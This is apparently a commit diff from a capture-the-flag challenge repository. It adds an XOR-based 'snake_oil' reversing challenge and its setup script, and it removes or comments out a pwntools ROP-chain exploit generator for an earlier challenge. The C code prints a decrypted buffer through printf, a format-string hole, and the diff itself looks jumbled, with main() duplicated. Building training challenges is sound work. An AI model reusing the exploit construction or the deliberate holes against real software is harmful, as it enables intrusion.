Commit 1e4fb55c authored by GovanifY's avatar GovanifY
Browse files

snake_oil done

parent f4070c10
......@@ -11,8 +11,10 @@ challenges done:
* simple_rop
* simple_rop_2
* web_server
* snake_oil
TODO:
* web_server_2
* snake_oil_2
* access_security
* modern_rop
* reverse
* misc format_string(?)
all:
gcc -w main.c -o snake_oil
strip snake_oil
......@@ -30,28 +30,36 @@ void snake_oil_crypto(char **argv) {
for(int i=0; i<sizeof verif_string/sizeof *verif_string; i+=4){
verif_string[i]=(char)((unsigned int)verif_string[i]^val[0]);
verif_string[i+1]=(char)((unsigned int)verif_string[i+1]^val[1]);
//--JUNK CODE--
//--JUNK CODE--
verif_string[i+2]=(char)((unsigned int)verif_string[i+2]^val[2]);
verif_string[i+3]=(char)((unsigned int)verif_string[i+3]^val[3]);
if(!(verif_string[i] == 0x00 && verif_string[i+1] == 0x00 &&
verif_string[i+2] == 0x00 && verif_string[i+3] == 0x00)) {
//--JUNK CODE--
//--JUNK CODE--
printf("Raté!\n");
return;
}
flag_encrypted[i]=(char)((unsigned int)flag_encrypted[i]^val[0]);
flag_encrypted[i+1]=(char)((unsigned int)flag_encrypted[i+1]^val[1]);
//--JUNK CODE--
//--JUNK CODE--
flag_encrypted[i+2]=(char)((unsigned int)flag_encrypted[i+2]^val[2]);
flag_encrypted[i+3]=(char)((unsigned int)flag_encrypted[i+3]^val[3]);
}
printf("Gagné! Voici le flag:\n");
printf(flag_encrypted);
}
int main(int argc, char **argv){
//--JUNK CODE--
//--JUNK CODE--
printf(flag_encrypted);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
......
......@@ -21,83 +21,34 @@ for c in flag:
flag_enc.append(ord(c)^key[(i%4)])
verif.append(key[(i%4)])
i+=1
flag_enc_c=str(bytes(flag_enc))[2:-1]
verif_c=str(bytes(verif))[2:-1]
print(flag_enc_c)
print(verif_c)
s=bytes(flag_enc).hex()
flag_enc_c="\\x" + "\\x".join(a+b for a,b in zip(s[::2], s[1::2]))
s=bytes(verif).hex()
verif_c="\\x" + "\\x".join(a+b for a,b in zip(s[::2], s[1::2]))
replace_text("main.c", "VERIF_C", verif_c)
replace_text("main.c", "FLAG_ENC_C", flag_enc_c)
print(bytes(key).hex())
subprocess.call("make", stdout=FNULL, stderr=FNULL)
"""
# junk code generation
write_junk_calls("main.c", 134, 2)
write_junk_calls("main.c", 62)
write_junk_calls("main.c", 57, 4)
write_junk_calls("main.c", 50, 4)
write_junk_calls("main.c", 42, 4)
write_junk_calls("main.c", 34)
write_junk_body("main.c", 14)
# replace flags in source file
f = open("flag.txt", "r")
flag=f.readline()
flag1=flag[:10]
flag2=flag[10:20]
flag3=flag[30:40]
flag4=flag[40:50]
flag5=flag[50:60]
flag6=flag[60:]
replace_text("main.c", "FLAG_PART_1", flag1)
replace_text("main.c", "FLAG_PART_2", flag2)
replace_text("main.c", "FLAG_PART_3", flag3)
replace_text("main.c", "FLAG_PART_4", flag4)
replace_text("main.c", "FLAG_PART_5", flag5)
replace_text("main.c", "FLAG_PART_6", flag6)
replace_text_random_hash("main.c", "FLAG_WRONG")
subprocess.call("make", stdout=FNULL, stderr=FNULL)
# we generate the rop
elf = ELF("reverse_rop")
rop = ROP(elf)
FLAG1 = elf.symbols['flag1']
FLAG2 = elf.symbols['flag2']
FLAG3 = elf.symbols['flag3']
FLAG6 = elf.symbols['flag6']
XOR = elf.symbols['xor']
XOR2 = elf.symbols['xor2']
XOR3 = elf.symbols['xor3']
POP_ONCE = (rop.find_gadget(['pop ebx', 'ret']))[0]
padding = b'A' * 28
exploit = padding + p32(FLAG1) + p32(FLAG2) + p32(POP_ONCE) + p32(0xAABBCCD2)
exploit += p32(XOR) + p32(FLAG3) + p32(POP_ONCE) + p32(0xAABBCCD1) + p32(FLAG3)
exploit += p32(POP_ONCE) + p32(0xAABBCCD2) + p32(XOR2) + p32(FLAG3) +p32(POP_ONCE)
exploit += p32(0xAABBCCD5) + p32(XOR3) + p32(FLAG6) + p32(POP_ONCE) + p32(0xBBCCDDE9) + p32(0xBBCCDDE3)
# rop is saved as input
f = open("input", "wb")
f.write(exploit)
f.close()
# strip it after the ropchain building so they don't have the symbols but we do
subprocess.call(["strip", "reverse_rop"], stdout=FNULL, stderr=FNULL)
os.remove("main.c")
os.remove("Makefile")
os.remove("setup.py")
os.remove("flag.txt")
# TESTING BINARY
try:
output = subprocess.check_output("gdb -ex 'run < input' -ex 'print $eip' -ex quit ./reverse_rop | tail -n 1", shell=True, stderr=subprocess.STDOUT)
output = subprocess.check_output("./snake_oil " + bytes(key).hex(), shell=True, stderr=subprocess.STDOUT)
except Exception as e:
output = str(e.output)
if not b"0xbbccdde3" in output:
if not flag.encode("utf-8") in output:
fail_test()
"""
os.remove("main.c")
os.remove("Makefile")
os.remove("setup.py")
os.remove("flag.txt")
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment